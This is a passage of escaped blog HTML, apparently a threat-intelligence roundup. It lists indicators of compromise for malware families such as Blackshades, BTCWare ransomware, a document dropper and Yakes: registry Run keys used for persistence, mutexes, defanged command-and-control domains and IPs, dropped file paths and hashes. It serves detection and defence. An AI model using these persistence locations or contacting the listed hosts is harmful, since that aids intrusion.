&lt;/b&gt;IntelPowerAgent[0-9]&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;DGA Domains&lt;/li&gt;&lt;li&gt;adtejoyo1377[.]tk&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%PROGRAMDATA%\[a-z0-9]{8}.exe&lt;/li&gt;&lt;li&gt;%APPDATA%\[a-z0-9]{8}.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424&lt;/li&gt;&lt;li&gt;5283c7d5db5b5629b5b58534bcf6cd7607f0d015d740ca91ee85ade420b7460f&lt;/li&gt;&lt;li&gt;2271a2e9d72580e98331792d94fca75e5a0c1dfee958d79652adf9eaab3ee266&lt;/li&gt;&lt;li&gt;fc9a9633b8ab0b78a820c74bda57ab608316c81d6ed6b469e7487ce3712bf62b&lt;/li&gt;&lt;li&gt;3ad0138c2d8842f3aef8b045e05e28e441b81ea8444dce0b6799f4ec65c70540&lt;/li&gt;&lt;li&gt;23045a27de525a0d8c85390414ac4458a32bdbd6f9dc8f0e39b32dad3f89fa55&lt;/li&gt;&lt;li&gt;55768ac9504b8e612b380fc0984277f0576dd8d129a5363e73d4d2a9baff5c7e&lt;/li&gt;&lt;li&gt;06144d28c5d1db06fa8f78fdcb651145d6500483a9b1fe26c62a510dbe1763b7&lt;/li&gt;&lt;li&gt;bace9b3e3220c6e9f6281f4d4a1eabb9223e6093ccc9876c600a31671b790ed2&lt;/li&gt;&lt;li&gt;fbaab6ab727898b1ff27fdffec49bbe00976474b93741b1fca5eeb38f1f25099&lt;/li&gt;&lt;li&gt;0c4a32e9eaeb38e1b30ad44f52c4f8ea3f2e3f522d9b2281ecd3701383b20cfa&lt;/li&gt;&lt;li&gt;252db718eb383331a34cbe53c0b9889c80452e19bc06007e740eaa23e2ef2a8f&lt;/li&gt;&lt;li&gt;ca9c3f80a3faaaf001f3fdb37e1cf9abb14a1628be2a9f6ba4e0cc51ed708cb9&lt;/li&gt;&lt;li&gt;27922f495e54bf51cb7329a75c533ca4a1ab8323f1f781dfd027571a37c7485f&lt;/li&gt;&lt;li&gt;f1dcb8e18a764d300267f2bc0873bf8ec15385cec7ab1d2871e43f238f86a6f1&lt;/li&gt;&lt;li&gt;a9639bd0930f2db17de0321f99ce70355f1dba17b4aa6f5444a4c2490738e255&lt;/li&gt;&lt;li&gt;c0522065fbce82a74d13361c88be210f62a8633c9a59203cea0ce6722619092b&lt;/li&gt;&lt;li&gt;f7e904b2eb8c5280d008cdf93e10fab87df6bb2423bdf1e8f7bb203f63c15ede&lt;/li&gt;&lt;li&gt;280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424&lt;/li&gt;&lt;li&gt;e2404f8fb7f080cb0b344c1f006cde4a00143641633bb454069773d616a9106e&lt;/li&gt;&lt;li&gt;b232dccdb27873c64616d2cefcf2dd81f7958ec8778e31da7f1688a68fda4249&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-4mLKZYJz0VE/WU1v7J-a-zI/AAAAAAAABHc/eNVrg6JDjNMgHHiFa-yE6_2VNixeCvUPgCLcBGAs/s1600/280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://2.bp.blogspot.com/-4mLKZYJz0VE/WU1v7J-a-zI/AAAAAAAABHc/eNVrg6JDjNMgHHiFa-yE6_2VNixeCvUPgCLcBGAs/s320/280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-PUZNME1Wcc8/WU1v-r4alVI/AAAAAAAABHg/IKxMWNkPX0M5NdiHlAHJZS6Dimg6VCUMwCLcBGAs/s1600/280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="303" data-original-width="1237" height="97" src="https://3.bp.blogspot.com/-PUZNME1Wcc8/WU1v-r4alVI/AAAAAAAABHg/IKxMWNkPX0M5NdiHlAHJZS6Dimg6VCUMwCLcBGAs/s400/280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-g76l7gH4_bM/WU1wDMhqWTI/AAAAAAAABHk/yKSkAYOeUYoHqjcliz1c5EK591l8dUEHQCLcBGAs/s1600/adtejoyo1377.tk_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="414" data-original-width="1112" height="148" src="https://3.bp.blogspot.com/-g76l7gH4_bM/WU1wDMhqWTI/AAAAAAAABHk/yKSkAYOeUYoHqjcliz1c5EK591l8dUEHQCLcBGAs/s400/adtejoyo1377.tk_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Blackshades-6327385-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;HKU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;HKU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;LVLWU6KG22&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\jd7018sy8tv.exe.jpg&lt;/li&gt;&lt;li&gt;%AppData%\D6GM5WGET8&lt;/li&gt;&lt;li&gt;%AppData%\JD7018SY8TV.exe.tmp&lt;/li&gt;&lt;li&gt;%AppData%\JD7018SY8TV.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;017a3ea76063f364f9d7a70ecde761e22005b74fce020e798e6151d3806dd251&lt;/li&gt;&lt;li&gt;0620a1061f4c14acbaa3b5b70bab4894aae33bc9f30bc8623ea9f63ddc953088&lt;/li&gt;&lt;li&gt;0743dd7863c03515d74a1832592c1409bdff0d30aac4f45ba73dc99ef3c1e5e3&lt;/li&gt;&lt;li&gt;086be8b2789ccb88f60c71773de7c22cf1d97aa72d2b21a3cde9248cc7321606&lt;/li&gt;&lt;li&gt;0a3e9d5ec49cc97f1c9fc2a59e53462d0d2fe6fa1f448e69e401e63769dafe0a&lt;/li&gt;&lt;li&gt;0ba95e35fcde6b1b3f49d1267e3dea8f2a8b4acb5633bc3acb3aefe9bf3e7680&lt;/li&gt;&lt;li&gt;0d58482c771ef85649f1375f6ab61c48c380c7694b3ad7552af1bdc1ec724890&lt;/li&gt;&lt;li&gt;1014e1c1246a6c7cbb519ed711a2168955ee4b4222baae5be911f981088604db&lt;/li&gt;&lt;li&gt;15a64cded5bcf3dc911bfeb3a5701a376dea51f9f8530dc0949ba6e6f4339cc4&lt;/li&gt;&lt;li&gt;18039335deeaf295164f5e24c5afbcc50fa27f2eaf5733be2cf51bcf01f664c3&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-66KH1jJlEqc/WPEt-Ko8v2I/AAAAAAAAA2g/GrNoHGx8SNUOC06ooqgWLzZkwpmkiUjjgCLcB/s400/amp-threatgrid-esa-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-66KH1jJlEqc/WPEt-Ko8v2I/AAAAAAAAA2g/GrNoHGx8SNUOC06ooqgWLzZkwpmkiUjjgCLcB/s400/amp-threatgrid-esa-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-wGQI5lqyHzQ/WU1wIn2SvVI/AAAAAAAABHo/V6rYEdG96yojrBrPjnD9Gkf4y6CkQilrQCLcBGAs/s1600/Amp_Blackshades.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="241" data-original-width="351" height="218" src="https://3.bp.blogspot.com/-wGQI5lqyHzQ/WU1wIn2SvVI/AAAAAAAABHo/V6rYEdG96yojrBrPjnD9Gkf4y6CkQilrQCLcBGAs/s320/Amp_Blackshades.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-IhapRwIA1l8/WU1wNMYBSpI/AAAAAAAABHs/oWmCq0wy6bcH-0ffFKc9m6FH98Z2RfSWwCLcBGAs/s1600/Threatgrid_Blackshades.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="229" data-original-width="847" height="107" src="https://4.bp.blogspot.com/-IhapRwIA1l8/WU1wNMYBSpI/AAAAAAAABHs/oWmCq0wy6bcH-0ffFKc9m6FH98Z2RfSWwCLcBGAs/s400/Threatgrid_Blackshades.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Ransomware.BTCWare-6329927-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;ONYONLOCK&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%WinDir%\SoftwareDistribution\DataStore\DataStore.edb&lt;/li&gt;&lt;li&gt;%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk&lt;/li&gt;&lt;li&gt;%System32%\config\SysEvent.Evt&lt;/li&gt;&lt;li&gt;%System32%\config\WindowsPowerShell.evt&lt;/li&gt;&lt;li&gt;%UserProfile%\Desktop\!#_RESTORE_FILES_#!&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;0951b80a41f06f8062c85c80be0276c6a1328edb2a501ed69ed25083303724d2&lt;/li&gt;&lt;li&gt;0b5b4111df2b4b2f78ec053db14ea5c74965ec13f1902570b06697d71a77dcd7&lt;/li&gt;&lt;li&gt;1cde4818229f719153565dd84b01d3927928e7a2b6a61684ee932520f55250a9&lt;/li&gt;&lt;li&gt;3f9b9062ca3497614ac021146b229b07786774934f98a261547b24df5cc5b263&lt;/li&gt;&lt;li&gt;6617035053954a5131d401061c58831e181ddfde221f402029d5ed4bd39561dd&lt;/li&gt;&lt;li&gt;6b4363a419208d6fe093f5a95b55653560d236e1a302f98d22fdfc36488ebcb1&lt;/li&gt;&lt;li&gt;72653d3a882901867143579131a6e9dff2f72a647afe21035c1deda0c4c943b0&lt;/li&gt;&lt;li&gt;741950e9be430267efff601fca1a7c21b65b904658fa46f9e618ea50787faaac&lt;/li&gt;&lt;li&gt;79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b&lt;/li&gt;&lt;li&gt;7bd14a6ceacc14e67e84add894d432c6383676ea89265b36515014cd136851e3&lt;/li&gt;&lt;li&gt;7c19bc3a4ad7cddcd78eee053b408779c25a56c9666e9cc9d76ea617aaa0934d&lt;/li&gt;&lt;li&gt;7f86548bdcd97e3faa3e8df0bd6b6aac7c05ed9d445a2bb7973a4d6efd39bd6a&lt;/li&gt;&lt;li&gt;880d25776e08769a75c43bf9a69f9f7cafcc46546690270fa36785195f327d97&lt;/li&gt;&lt;li&gt;8bbaa450526bc2933d462ae24439148273434ff342e0a0774d5e37af4bb16864&lt;/li&gt;&lt;li&gt;97b88ae6bee56ae6193c7908eaabac9be579861868cc575cc345c1d1bca1e302&lt;/li&gt;&lt;li&gt;cef0439b7b483900323614d6cf2eb341019d747aaa0feb81710ef836d330ca9c&lt;/li&gt;&lt;li&gt;d0ab335e86e665edbab58240ae6aa691fa4802ae831c0204e71f90a34ae66983&lt;/li&gt;&lt;li&gt;db5fefc3b8349efa907ed2812c869b10d8de109ff005fe8aac15eaa4c8efdcb8&lt;/li&gt;&lt;li&gt;eb843f4f80ae2e58b569f916239c6208601eece08efb334ae12b8658e3436987&lt;/li&gt;&lt;li&gt;ed3118f96c7e87ea768a40acc574b2ff3cae3a3cdf2419ccb30c750a876d5f30&lt;/li&gt;&lt;li&gt;f7850a2efe397098859d8c3d0ed0b4fa93f87148382e250f094d12f021bc8460&lt;/li&gt;&lt;li&gt;f9d27f4f3231cd80b19b30de4426aecada466e18ee785e82d5afa59e986b4d16&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-pX-R1RCUD6U/WU1wU5x2ghI/AAAAAAAABHw/_Vz4u7WxHeo5CusTXv8IReNzJ5FT8wGsACLcBGAs/s1600/79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://3.bp.blogspot.com/-pX-R1RCUD6U/WU1wU5x2ghI/AAAAAAAABHw/_Vz4u7WxHeo5CusTXv8IReNzJ5FT8wGsACLcBGAs/s320/79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-LehONwXbovc/WU1wXYyQPmI/AAAAAAAABH0/WIZUUum7EZETl-A7CdYVogkUMrd2JvCZwCLcBGAs/s1600/79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="387" data-original-width="1237" height="125" src="https://3.bp.blogspot.com/-LehONwXbovc/WU1wXYyQPmI/AAAAAAAABH0/WIZUUum7EZETl-A7CdYVogkUMrd2JvCZwCLcBGAs/s400/79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Doc.Dropper.Agent-6330744-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;wi92[.]js2-order[.]pl&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87&lt;/li&gt;&lt;li&gt;3a8abf2f7fade51114fde4251ff98b23093e07a7545be3568f3da7ba730bb995&lt;/li&gt;&lt;li&gt;3a93346632f58a112708b761154a170be06de1b6a0583f58053cfb1fce09c780&lt;/li&gt;&lt;li&gt;6465c7ce45a1430e55cf10e43732892a1f86fa90646adf5628dd6d72dd849e8f&lt;/li&gt;&lt;li&gt;6ab9d03a0fc72b377712f262601db2f14561e6f285d9742e956416409bba3e64&lt;/li&gt;&lt;li&gt;8daded1c8acd270c0371e6c24310dacb4d841c801b707594823f371ce601f29b&lt;/li&gt;&lt;li&gt;9b23fd1d89331bddc13063391bea1c03fbaf813a584554cd43b1d6bb6574992a&lt;/li&gt;&lt;li&gt;d19a574a36079ca7885ae142c0f24578743eb98cca7f57df3c2258c8dbb874bc&lt;/li&gt;&lt;li&gt;d31705a64e38340872f6b9e8287e0297d4fd13cb8373295ce0d9ffdf6947e43f&lt;/li&gt;&lt;li&gt;e545a49f26d1482225dd25bf0b2790a1f6d5f96bda9afd90ec8cd38b7b20ec07&lt;/li&gt;&lt;li&gt;f048103ee6f0902b3025729301ce9bbbfee35272bc594be2a6cbd7da72f6f4c4&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-VMerXo9gmwU/WU1wd2wDrII/AAAAAAAABH4/7CWQB0prd88IYFTLmDBREdVzLaHR5dTTQCLcBGAs/s1600/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="241" data-original-width="351" height="218" src="https://4.bp.blogspot.com/-VMerXo9gmwU/WU1wd2wDrII/AAAAAAAABH4/7CWQB0prd88IYFTLmDBREdVzLaHR5dTTQCLcBGAs/s320/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/--mC58kty8yo/WU1wg0p5ZHI/AAAAAAAABH8/A78mV22ukpgMoKZMnmSaDf4rDwlRV67SgCLcBGAs/s1600/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="618" data-original-width="1151" height="213" src="https://4.bp.blogspot.com/--mC58kty8yo/WU1wg0p5ZHI/AAAAAAAABH8/A78mV22ukpgMoKZMnmSaDf4rDwlRV67SgCLcBGAs/s400/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-02uXDajlYQQ/WU1wjnovpuI/AAAAAAAABIA/5XtMo8U_-dwyLTBSy0jn_Sy61N4evUZ8gCLcBGAs/s1600/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="416" data-original-width="1312" height="126" src="https://1.bp.blogspot.com/-02uXDajlYQQ/WU1wjnovpuI/AAAAAAAABIA/5XtMo8U_-dwyLTBSy0jn_Sy61N4evUZ8gCLcBGAs/s400/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-ECvfbje4y4c/WU1woljj9sI/AAAAAAAABIE/OVjQaXgwLBM2XiU5945o6xWnSqzOfYq1gCLcBGAs/s1600/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1197" data-original-width="1600" height="298" src="https://2.bp.blogspot.com/-ECvfbje4y4c/WU1woljj9sI/AAAAAAAABIE/OVjQaXgwLBM2XiU5945o6xWnSqzOfYq1gCLcBGAs/s400/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_malware.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Yakes-6330794-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;35bbded46273bc9f6fa3fc5557dba9af&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;35bbded46273bc9f6fa3fc5557dba9af&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\35bbded46273bc9f6fa3fc5557dba9af&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;qazwsxedc&lt;/li&gt;&lt;li&gt;35bbded46273bc9f6fa3fc5557dba9af&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;105[.]154[.]213[.]56&lt;/li&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;pokas12[.]ddns[.]net&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%TEMP%\IXP000.TMP\1.xyz&lt;/li&gt;&lt;li&gt;%SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Startup\x.vbs&lt;/li&gt;&lt;li&gt;%TEMP%\server.exe&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 